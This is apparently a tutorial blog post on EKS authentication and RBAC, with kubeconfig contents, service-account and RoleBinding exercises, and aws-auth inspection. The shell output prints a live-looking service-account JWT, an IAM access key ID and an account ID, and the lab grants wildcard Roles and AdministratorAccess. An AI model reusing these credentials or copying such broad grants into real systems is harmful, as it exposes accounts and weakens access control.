Authentication & Authorization of AWS EKS

Sigrid Jin
66 min readApr 13, 2024

--

In Kubernetes, including EKS, the authentication and authorization process follows a specific flow when a kubectl command is issued.

Authentication

Authentication is the process of verifying the identity of the user or entity making the request. In the context of EKS, authentication typically involves the following:

1. kubeconfig file: The kubeconfig file contains the authentication information required to interact with the Kubernetes API server. It includes details such as the API server’s URL, user credentials, and authentication mechanisms.

2. Authentication methods: Kubernetes supports various authentication methods, including client certificates, bearer tokens, and authentication plugins. The chosen authentication method is specified in the kubeconfig file.

3. User authentication: When a `kubectl` command is executed, the authentication information from the `kubeconfig` file is sent to the API server. The API server validates the provided credentials and authenticates the user.

Authorization

Once the user is authenticated, the next step is authorization. Authorization determines what actions the authenticated user is allowed to perform within the Kubernetes cluster. EKS uses Role-Based Access Control (RBAC) for authorization.

1. RBAC: RBAC is a mechanism that defines roles and permissions for users or groups within the cluster. It allows administrators to grant specific permissions to users based on their roles.

2. Roles and RoleBindings: Roles define a set of permissions for accessing and manipulating Kubernetes resources. RoleBindings associate roles with users or groups, granting them the specified permissions.

3. Cluster-level and namespace-level permissions: RBAC can be applied at the cluster level (ClusterRole and ClusterRoleBinding) or at the namespace level (Role and RoleBinding). Cluster-level permissions are applicable across all namespaces, while namespace-level permissions are specific to a particular namespace.

Admission Control

After the request passes the authentication and authorization checks, it goes through the admission control phase. Admission controllers are plugins that can modify or validate the request before it is persisted in the cluster. EKS uses two types of admission controllers:

1. Mutating Admission Controllers: These controllers can modify the request payload before it is saved in the cluster. They can perform tasks such as injecting sidecar containers, modifying resource requests/limits, or adding labels to objects.

2. Validating Admission Controllers: These controllers validate the request payload against predefined policies or rules. They can reject requests that violate certain constraints or don’t meet specific criteria.

Admission controllers can be implemented using webhooks, which allow external services to participate in the admission process. Webhooks enable the integration of custom logic or third-party services into the admission flow.

./kube/config File

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# cat ~/.kube/config
apiVersion: v1
clusters:
- cluster:
certificate-authority-data: ""
server: https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com
name: sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
contexts:
- context:
cluster: sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
namespace: default
user: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
name: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
current-context: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
kind: Config
preferences: {}
users:
- name: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
user:
exec:
apiVersion: client.authentication.k8s.io/v1beta1
args:
- eks
- get-token
- --output
- json
- --cluster-name
- sigridjin-ekscluster-240413-3
- --region
- ap-northeast-2
command: aws
env:
- name: AWS_STS_REGIONAL_ENDPOINTS
value: regional
interactiveMode: IfAvailable
provideClusterInfo: false

The `./kube/config` file, also known as the `kubeconfig` file, contains the configuration information required to interact with the Kubernetes cluster. It consists of three main sections:

1. Clusters: This section defines the Kubernetes API server’s endpoint information, such as the server URL and certificate authority data.

2. Users: This section contains the user authentication information, such as client certificates, bearer tokens, or authentication plugin configurations.

3. Contexts: Contexts combine the information from the clusters and users sections. They define which Kubernetes cluster and user credentials to use for a specific context. The current context determines the cluster and user for `kubectl` commands.

Practice 1. SA, Role, RoleBinding

Let’s explore the usage of Service Accounts (SA), Roles, and RoleBindings in a Kubernetes environment. The setup involves two Service Accounts, `dev-k8s` and `infra-k8s`, with different permissions (Roles and authorizations) in their respective namespaces, `dev-team` and `infra-team`. We will create separate `kubectl` pods and assign the corresponding Service Accounts to test the permissions.

We start by creating two namespaces, `dev-team` and `infra-team`, using the `kubectl create namespace` command. Then, we create the Service Accounts `dev-k8s` in the `dev-team` namespace and `infra-k8s` in the `infra-team` namespace using the `kubectl create sa` command. We can verify the created Service Accounts using `kubectl get sa` and inspect their details using `kubectl get sa -o yaml`.

kubectl create namespace dev-team
kubectl create ns infra-team

kubectl get ns

kubectl create sa dev-k8s -n dev-team
kubectl create sa infra-k8s -n infra-team

kubectl get sa -n dev-team
kubectl get sa dev-k8s -n dev-team -o yaml | yh

kubectl get sa -n infra-team
kubectl get sa infra-k8s -n infra-team -o yaml | yh

Service Accounts use bearer tokens for authentication, which are stored as secrets in the respective namespaces. We can retrieve the token information for the `dev-k8s` Service Account using `kubectl get secret` and decode the token using `base64 -d`. The token follows the JWT (JSON Web Token) format, which is a lightweight version of the X.509 certificate.

docker run --rm --name kubectl -v /path/to/your/kube/config:/.kube/config bitnami/kubectl:latest
cat <<EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
name: dev-kubectl
namespace: dev-team
spec:
serviceAccountName: dev-k8s
containers:
- name: kubectl-pod
image: bitnami/kubectl:1.28.5
command: ["tail"]
args: ["-f", "/dev/null"]
terminationGracePeriodSeconds: 0
EOF

cat <<EOF | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
name: infra-kubectl
namespace: infra-team
spec:
serviceAccountName: infra-k8s
containers:
- name: kubectl-pod
image: bitnami/kubectl:1.28.5
command: ["tail"]
args: ["-f", "/dev/null"]
terminationGracePeriodSeconds: 0
EOF

Next, we create `kubectl` pods in each namespace and assign the corresponding Service Accounts to them. We use the `bitnami/kubectl` container image, which provides the `kubectl` command-line tool. The pod specifications include the `serviceAccountName` field to specify the desired Service Account. We can verify the created pods and their assigned Service Accounts using `kubectl get pod` and `kubectl get pod -o yaml`.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod -o dev-kubectl -n dev-team -o yaml
serviceAccount: dev-k8s
serviceAccountName: dev-k8s

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod -o infra-kubectl -n infra-team -o yaml
serviceAccount: infra-k8s
serviceAccountName: infra-k8s

By accessing the pods using `kubectl exec`, we can examine the mounted Service Account tokens and related information. The tokens are stored in the `/run/secrets/kubernetes.io/serviceaccount` directory within the pod. We can verify the token, namespace, and CA certificate using `kubectl exec` commands.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it dev-kubectl -n dev-team -- ls /run/secrets/kubernetes.io/serviceaccount

ca.crt namespace token
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it dev-kubectl -n dev-team -- cat /run/secrets/kubernetes.io/serviceaccount/token

eyJhbGciOiJSUzI1NiIsImtpZCI6IjhlY2Y3Y2FkNzhhNmZiYWJjOTkwOGI1YzJhOGYyOGNlODA5MmMxOGQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc0NDUxMzE2MiwiaWF0IjoxNzEyOTc3MTYyLCJpc3MiOiJodHRwczovL29pZGMuZWtzLmFwLW5vcnRoZWFzdC0yLmFtYXpvbmF3cy5jb20vaWQvRkIyQjRGOTgyOERDM0Y3RDI0QTg0QTRBOEZBNzY2MzIiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImRldi10ZWFtIiwicG9kIjp7Im5hbWUiOiJkZXYta3ViZWN0bCIsInVpZCI6ImQ1YjY4MjY1LWIyNWYtNGQxNy1iYzQ4LTRiM2UxM2Q3MTNlMyJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGV2LWs4cyIsInVpZCI6IjljYmU2ZTFjLWI2MDYtNDNhOC1iMzgxLTRhMDQ0ZTdjYzMzMCJ9LCJ3YXJuYWZ0ZXIiOjE3MTI5ODA3Njl9LCJuYmYiOjE3MTI5NzcxNjIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZXYtdGVhbTpkZXYtazhzIn0.JvszWNG5JZ2-t8t4S1kAVA9jagbL7gdlKkqDlUjWC3rcfeTAGqMqyD7PKfd8eQhiUauRHjf0AJbifR61ubCOm0Enfk11b_gKPYCj17S893P8EH8uZVhTjCkbPXQjeEqfyobk1EEkIJzicWl_fKnkppc5prPQ9v8HN2XoG8IBoGrYMynC0fDXN6bGsawhiKe26V-v8mfF5gbLsDb31RbPUsZSl7IEOroxLf3ssVl51uK5ua1OCgcv5JEmiAx-pADHXZSorj4SOrOFlHERk73vXu2MfuMnUBiQlLkZJMTDpVYPUys3s5EjQl10b6uYLGV_igDzwOWVUnJM4nH-RB-YEA

To test the permissions of the Service Accounts, we use `alias` to create shorthand commands `k1` and `k2` for executing `kubectl` commands within the respective pods. We attempt various operations such as `get pods`, `run`, and `get pods -n kube-system` to observe the behavior. Initially, all actions result in errors because the Service Accounts lack the necessary permissions.

alias k1='kubectl exec -it dev-kubectl -n dev-team -- kubectl'
alias k2='kubectl exec -it infra-kubectl -n infra-team -- kubectl'
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it dev-kubectl -n dev-team -- kubectl get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:dev-team:dev-k8s" cannot list resource "pods" in API group "" in the namespace "dev-team"
command terminated with exit code 1

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it infra-kubectl -n infra-team -- kubectl get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:infra-team:infra-k8s" cannot list resource "pods" in API group "" in the namespace "infra-team"
command terminated with exit code 1

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it infra-kubectl -n infra-team -- kubectl auth can-i get pods
no
command terminated with exit code 1

To grant permissions to the Service Accounts, we create Roles in each namespace using the `kubectl create -f` command with the provided YAML definitions. The Roles specify the `apiGroups`, `resources`, and `verbs` that define the permitted actions. In this example, we create Roles with all permissions (`*`) within their respective namespaces. We can verify the created Roles using `kubectl get roles` and `kubectl describe roles`.

cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: role-dev-team
namespace: dev-team
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["*"]
EOF

cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: role-infra-team
namespace: infra-team
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["*"]
EOF
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe roles role-dev-team -n dev-team
Name: role-dev-team
Labels: <none>
Annotations: <none>
PolicyRule:
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]

To associate the Roles with the Service Accounts, we create RoleBindings using the `kubectl create -f` command with the provided YAML definitions. The RoleBindings specify the `roleRef` (the Role to bind) and the `subjects` (the Service Accounts to bind to the Role). We can verify the created RoleBindings using `kubectl get rolebindings` and `kubectl describe rolebindings`.

cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: roleB-dev-team
namespace: dev-team
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: role-dev-team
subjects:
- kind: ServiceAccount
name: dev-k8s
namespace: dev-team
EOF

cat <<EOF | kubectl create -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: roleB-infra-team
namespace: infra-team
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: role-infra-team
subjects:
- kind: ServiceAccount
name: infra-k8s
namespace: infra-team
EOF


(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe rolebindings roleB-dev-team -n dev-team
Name: roleB-dev-team
Labels: <none>
Annotations: <none>
Role:
Kind: Role
Name: role-dev-team
Subjects:
Kind Name Namespace
---- ---- ---------
ServiceAccount dev-k8s dev-team

With the Roles and RoleBindings in place, we can re-test the permissions using the `k1` and `k2` aliases. We observe that the `dev-kubectl` pod (`k1`) can perform actions within the `dev-team` namespace but lacks permissions in other namespaces like `kube-system`. Similarly, the `infra-kubectl` pod (`k2`) has permissions within the `infra-team` namespace but not in others.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# k1 auth can-i get pods
yes
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# k2 auth can-i get pods
yes

Practice 2. Checking RBAC

To begin, we install several RBAC-related plugins using the kubectl krew command. These plugins include access-matrix, rbac-tool, rbac-view, rolesum, and whoami.

We use the kubectl whoami command to verify the authenticated subject, which reveals the AWS IAM role or user associated with the current kubectl context. You can see that the authenticated subject is arn:aws:iam::9112…: /admin in this example.

The kubectl access-matrix command allows us to review access to cluster-scoped resources or namespaced resources in a specific namespace. This command generates an RBAC access matrix, providing an overview of the permissions associated with different subjects.

Using the kubectl rbac-tool lookup command, one can perform RBAC lookups based on subject names, such as users, groups, or service accounts. For example, kubectl rbac-tool lookup system:masters displays the RBAC information for the system:masters group, showing the associated cluster role and permissions.

The kubectl rbac-tool policy-rules command allows us to list the policy rules for specific subjects. We can use regular expressions to filter the subjects of interest. For example, kubectl rbac-tool policy-rules -e ‘^system:.*’ lists the policy rules for subjects starting with system:.

The kubectl rbac-tool show command generates a ClusterRole with all available permissions from the target cluster. This provides a comprehensive view of the permissions available in the cluster.

The kubectl rbac-tool whoami command displays the subject information for the current context used to authenticate with the cluster. In the example output, we see that the username has changed from kubernetes-admin to an AWS IAM user, and the groups include system:authenticated instead of system:master.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl rbac-tool whoami
{Username: "arn:aws:iam::712218945685:root",
UID: "aws-iam-authenticator:712218945685:712218945685",
Groups: ["system:authenticated"],
Extra: {accessKeyId: ["AKIA2LU4OVCK3P44FVL7"],
arn: ["arn:aws:iam::712218945685:root"],
canonicalArn: ["arn:aws:iam::712218945685:root"],
principalId: ["712218945685"],
sessionName: [""]}}

The kubectl rolesum command allows us to summarize RBAC roles for different subjects, such as service accounts, users, or groups. For example, kubectl rolesum aws-node -n kube-system summarizes the roles for the aws-node service account in the kube-system namespace.

The kubectl rbac-view command provides a visual representation of RBAC permissions. It starts a local web server and opens a web page displaying the RBAC roles and permissions in a user-friendly manner. This tool helps in understanding and analyzing the RBAC configuration in the cluster.

kubectl krew install access-matrix rbac-tool rbac-view rolesum whoami

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl whoami
arn:aws:iam::712218945685:root

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl access-matrix --namespace default
W0413 12:49:02.453673 11189 fetch_resources.go:70] Could not fetch full list of resources, result will be incomplete: unable to retrieve the complete list of server APIs: metrics.k8s.io/v1beta1: the server is currently unable to handle the request
NAME LIST CREATE UPDATE DELETE
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
✖ ✖ ✖ ✖
alertmanagerconfigs.monitoring.coreos.com ✔ ✔ ✔ ✔
alertmanagers.monitoring.coreos.com ✔ ✔ ✔ ✔
bindings ✔
configmaps ✔ ✔ ✔ ✔
controllerrevisions.apps ✔ ✔ ✔ ✔
cronjobs.batch ✔ ✔ ✔ ✔
csistoragecapacities.storage.k8s.io ✔ ✔ ✔ ✔
daemonsets.apps ✔ ✔ ✔ ✔
deployments.apps ✔ ✔ ✔ ✔
endpoints ✔ ✔ ✔ ✔
endpointslices.discovery.k8s.io ✔ ✔ ✔ ✔
events ✔ ✔ ✔ ✔
events.events.k8s.io ✔ ✔ ✔ ✔
horizontalpodautoscalers.autoscaling ✔ ✔ ✔ ✔
ingresses.networking.k8s.io ✔ ✔ ✔ ✔
jobs.batch ✔ ✔ ✔ ✔
leases.coordination.k8s.io ✔ ✔ ✔ ✔
limitranges ✔ ✔ ✔ ✔
localsubjectaccessreviews.authorization.k8s.io ✔
networkpolicies.networking.k8s.io ✔ ✔ ✔ ✔
persistentvolumeclaims ✔ ✔ ✔ ✔
poddisruptionbudgets.policy ✔ ✔ ✔ ✔
podmonitors.monitoring.coreos.com ✔ ✔ ✔ ✔
pods ✔ ✔ ✔ ✔
podtemplates ✔ ✔ ✔ ✔
policyendpoints.networking.k8s.aws ✔ ✔ ✔ ✔
probes.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheusagents.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheuses.monitoring.coreos.com ✔ ✔ ✔ ✔
prometheusrules.monitoring.coreos.com ✔ ✔ ✔ ✔
replicasets.apps ✔ ✔ ✔ ✔
replicationcontrollers ✔ ✔ ✔ ✔
resourcequotas ✔ ✔ ✔ ✔
rolebindings.rbac.authorization.k8s.io ✔ ✔ ✔ ✔
roles.rbac.authorization.k8s.io ✔ ✔ ✔ ✔
scrapeconfigs.monitoring.coreos.com ✔ ✔ ✔ ✔
secrets ✔ ✔ ✔ ✔
securitygrouppolicies.vpcresources.k8s.aws ✔ ✔ ✔ ✔
serviceaccounts ✔ ✔ ✔ ✔
servicemonitors.monitoring.coreos.com ✔ ✔ ✔ ✔
services ✔ ✔ ✔ ✔
statefulsets.apps ✔ ✔ ✔ ✔
targetgroupbindings.elbv2.k8s.aws ✔ ✔ ✔ ✔
thanosrulers.monitoring.coreos.com ✔ ✔ ✔ ✔

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl rbac-tool lookup system:masters
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+----------------+--------------+-------------+-----------+---------------+---------------+
system:masters | Group | ClusterRole | | cluster-admin | cluster-admin

When a kubectl command is executed, the following steps occur:

1. The kubectl command is wrapped with a bearer token and sent to the kube-apiserver.
2. In EKS, the kube-apiserver passes the token through a webhook for authentication.
3. The authenticity of the token is verified by checking the AWS configuration file using a ConfigMap.
4. Once authenticated, the token is passed back to the kube-apiserver.
5. The kube-apiserver then checks the Kubernetes RBAC configuration, verifying the roles and role bindings associated with the token.
6. Based on the RBAC configuration, the kube-apiserver determines whether to allow or deny the requested action.

Detailed Authentication Flow

1. When a kubectl command is executed, it requests a token from the EKS service endpoint (STS) using aws eks get-token. The response is a pre-signed URL containing the decoded GetCallerIdentity information.

$ (iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# cat ~/.kube/config
apiVersion: v1
clusters:
- cluster:
certificate-authority-data: ""
server: https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com
name: sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
contexts:
- context:
cluster: sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
namespace: default
user: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
name: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
current-context: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
kind: Config
preferences: {}
users:
- name: iam-root-account@sigridjin-ekscluster-240413-3.ap-northeast-2.eksctl.io
user:
exec:
apiVersion: client.authentication.k8s.io/v1beta1
args:
- eks
- get-token
- --output
- json
- --cluster-name
- sigridjin-ekscluster-240413-3
- --region
- ap-northeast-2
command: aws
env:
- name: AWS_STS_REGIONAL_ENDPOINTS
value: regional
interactiveMode: IfAvailable
provideClusterInfo: false

$ aws eks get-token --cluster-name $CLUSTER_NAME --region ap-northeast-2 | jq

$ (iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks get-token --cluster-name $CLUSTER_NAME --region ap-northeast-2 | jq
{
"kind": "ExecCredential",
"apiVersion": "client.authentication.k8s.io/v1beta1",
"spec": {},
"status": {
"expirationTimestamp": "2024-04-13T07:52:55Z",
"token": "k8s-aws-v1.aHR0cHM6Ly9zdHMuYXAtbm9ydGhlYXN0LTIuYW1hem9uYXdzLmNvbS8_QWN0aW9uPUdldENhbGxlcklkZW50aXR5JlZlcnNpb249MjAxMS0wNi0xNSZYLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUEyTFU0T1ZDSzNQNDRGVkw3JTJGMjAyNDA0MTMlMkZhcC1ub3J0aGVhc3QtMiUyRnN0cyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNDEzVDA3Mzg1NVomWC1BbXotRXhwaXJlcz02MCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QlM0J4LWs4cy1hd3MtaWQmWC1BbXotU2lnbmF0dXJlPTUyNGM3YmVhNTFiZjhlMjAyOWJmNjFkZDI1MjI0MWE2NTUwYzRmMzQ5YjVlYmQ2MmMyYTRhMjJhY2FjYWIxNzI"
}
}
kubectl describe clusterrole cluster-admin

2. The AWS STS (Security Token Service) is used to control access to AWS resources by providing temporary security credentials (STS tokens). With AWS CLI version 1.16.156 or later, aws eks get-token can be used without separately installing aws-iam-authenticator.
3. The aws sts get-caller-identity command can be used to verify the ARN (Amazon Resource Name) of the caller’s identity.
4. The ~/.kube/config file contains the EKS public server endpoint in the clusters.server field.
5. The aws eks get-token command is used to request temporary security credentials (tokens) from AWS STS. The token is automatically refreshed when the expirationTimestamp is reached.
6. The EKS API sends a token review request to the webhook token authenticator for authentication.
7. Once approved by the webhook token authenticator, the request proceeds to the next step.
8. The tokenreviews API resource is used for token review purposes in Kubernetes.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl api-resources | grep authentication

selfsubjectreviews authentication.k8s.io/v1 false SelfSubjectReview
tokenreviews authentication.k8s.io/v1 false TokenReview
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get cm aws-auth -n kube-system -o yaml
apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}
kind: ConfigMap
metadata:
creationTimestamp: "2024-04-13T02:49:50Z"
name: aws-auth
namespace: kube-system
resourceVersion: "1566"
uid: 08a6ec8b-e334-4ad1-8039-e63c68553e7e

After successful authentication, the EKS API Server compares the authenticated user/role ARN with the mappings in the aws-auth ConfigMap to determine the user's permissions. The EKS cluster creator is automatically granted the system:masters group and kubernetes-admin username, which is associated with the cluster-admin ClusterRole, granting full control over the cluster. RBAC is used to authorize actions based on the user's assigned roles and permissions. Additionally, webhook configurations are employed to validate changes to critical resources like the aws-auth ConfigMap, ensuring the integrity and security of the cluster.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get cm aws-auth -n kube-system -o yaml
apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}
kind: ConfigMap
metadata:
creationTimestamp: "2024-04-13T02:49:50Z"
name: aws-auth
namespace: kube-system
resourceVersion: "1566"
uid: 08a6ec8b-e334-4ad1-8039-e63c68553e7e

Once the EKS API Server receives the authenticated user/role ARN (Amazon Resource Name) from the AWS STS (Security Token Service), it compares this ARN with the ARNs mapped in the aws-auth ConfigMap. The aws-auth ConfigMap contains the mappings between IAM users/roles and Kubernetes objects (users, groups, etc.).

It’s important to note that the IAM user who created the EKS cluster is not visible in the aws-auth ConfigMap. This is an intentional decision made by AWS to prevent accidental loss of EKS access permissions due to human error. However, the EKS cluster creator can still be identified using the rbac-tool Kubernetes plugin.

If a matching ARN is found in the aws-auth ConfigMap, the user is granted the corresponding permissions in the Kubernetes cluster. If no matching ARN is found, the kubectl command will fail due to lack of authorization.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl rbac-tool whoami
{Username: "arn:aws:iam::712218945685:root",
UID: "aws-iam-authenticator:712218945685:712218945685",
Groups: ["system:authenticated"],
Extra: {accessKeyId: ["AKIA2LU4OVCK3P44FVL7"],
arn: ["arn:aws:iam::712218945685:root"],
canonicalArn: ["arn:aws:iam::712218945685:root"],
principalId: ["712218945685"],
sessionName: [""]}}

The authorization process relies on Kubernetes RBAC to determine the user’s permissions based on their associated roles and cluster bindings. The IAM principal (user or role) that created the EKS cluster is automatically granted the system:masters group and kubernetes-admin username, regardless of the aws-auth ConfigMap.

The system:masters group is associated with the cluster-admin ClusterRole through a ClusterRoleBinding. The cluster-admin ClusterRole grants full control over all resources in the cluster, as evident from its policy rules that allow all verbs (*) on all resources (*.*).

On the other hand, the system:authenticated group represents all authenticated users in the cluster. The permissions for this group can be examined using the kubectl rbac-tool lookup and kubectl rolesum commands.

Kubernetes also utilizes validating and mutating webhook configurations to intercept and modify API requests. These webhooks are registered as API resources, such as validatingwebhookconfigurations and mutatingwebhookconfigurations.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl api-resources | grep Webhook

mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get validatingwebhookconfigurations

NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 4h48m
eks-aws-auth-configmap-validation-webhook 1 5h22m
kube-prometheus-stack-admission 1 4h59m
vpc-resource-validating-webhook 2 5h22m
system:masters , system:authenticated group information
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}
kubectl rbac-tool lookup system:masters
kubectl rbac-tool lookup system:authenticated
kubectl rolesum -k Group system:masters
kubectl rolesum -k Group system:authenticated
# The cluster role that system:master groups can be utilized
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe clusterrolebindings.rbac.authorization.k8s.io cluster-admin

Name: cluster-admin
Labels: kubernetes.io/bootstrapping=rbac-defaults
Annotations: rbac.authorization.kubernetes.io/autoupdate: true
Role:
Kind: ClusterRole
Name: cluster-admin
Subjects:
Kind Name Namespace
---- ---- ---------
Group system:masters
# cluster-admin의 policy rule -- let's use all resources!
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe clusterrole cluster-admin

Name: cluster-admin
Labels: kubernetes.io/bootstrapping=rbac-defaults
Annotations: rbac.authorization.kubernetes.io/autoupdate: true
PolicyRule:
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
[*] [] [*]

The validatingwebhookconfigurations resource is specifically used to validate changes to certain Kubernetes objects, such as the aws-auth ConfigMap. These webhook configurations ensure that only authorized modifications are allowed to critical cluster resources.

Practice: Organizing Distributed Environment Practice for DevOps Freshers

Let’s assume that we have two bastions to practice to assume there’s master account and the account for newcomers in devops team.

Step 1: [myeks-bastion] Create a testuser user with AdministratorAccess permissions

  1. Create a testuser user using the command aws iam create-user --user-name testuser.
  2. Grant the user programmatic access by creating an access key using aws iam create-access-key --user-name testuser.
  3. Attach the AdministratorAccess policy to the testuser user using aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name testuser.
  4. Verify the caller identity using aws sts get-caller-identity --query Arn.
  5. Check the kubectl identity using kubectl whoami.
  6. Retrieve the public IP address of the myeks-bastion-EC2–2 instance using aws ec2 describe-instances.
